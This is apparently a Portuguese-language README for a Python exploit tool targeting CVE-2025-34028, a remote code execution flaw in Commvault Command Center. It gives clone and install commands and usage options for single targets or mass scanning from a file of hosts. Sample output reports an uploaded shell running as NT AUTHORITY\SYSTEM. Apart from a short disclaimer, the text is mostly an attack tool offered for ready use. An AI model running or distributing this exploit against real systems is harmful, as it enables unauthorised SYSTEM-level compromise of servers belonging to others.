
Prova de Conceito (PoC) para CVE-2025-34028, uma vulnerabilidade de Execução Remota de Código no Commvault Command Center. Este script Python verifica um ou vários alvos, executa comandos e relata hosts vulneráveis.
Um exploit em Python para CVE-2025-34028, uma vulnerabilidade de execução remota de código no Commvault Command Center. Esta ferramenta permite testar alvos únicos ou escanear múltiplos hosts em lote.
git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt
Instale os requisitos com:
pip install requests tabulate
usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)
CVE-2025-34028 Commvault RCE Exploit
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Single target URL (e.g., https://192.168.1.100:8000)
-f TARGETS_FILE, --file TARGETS_FILE
File containing multiple targets, one per line
Testar um alvo único:
python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000
Escanear múltiplos alvos a partir de um arquivo:
python CVE-2025-34028-Commvault.py -f targets.txt
O arquivo de alvos deve conter um alvo por linha no formato:
https://host:port
http://ip
Exemplo de targets.txt:
https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443
O script fornece:
Exemplo de saída:
CVE-2025-34028 Commvault RCE PoC
[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM
[+] Results Summary
+---------+------------------------------+---------------------+------------------+
| Index | URL | Status | System User |
+---------+------------------------------+---------------------+------------------+
| 1 | https://cvtest.example.com:8000 | RCE Successful | NT AUTHORITY\SYSTEM |
+---------+------------------------------+---------------------+------------------+
Esta ferramenta é apenas para fins educacionais e de testes autorizados. O autor não é responsável por qualquer uso indevido ou dano causado por este programa.
Licença MIT - Consulte o arquivo LICENSE para detalhes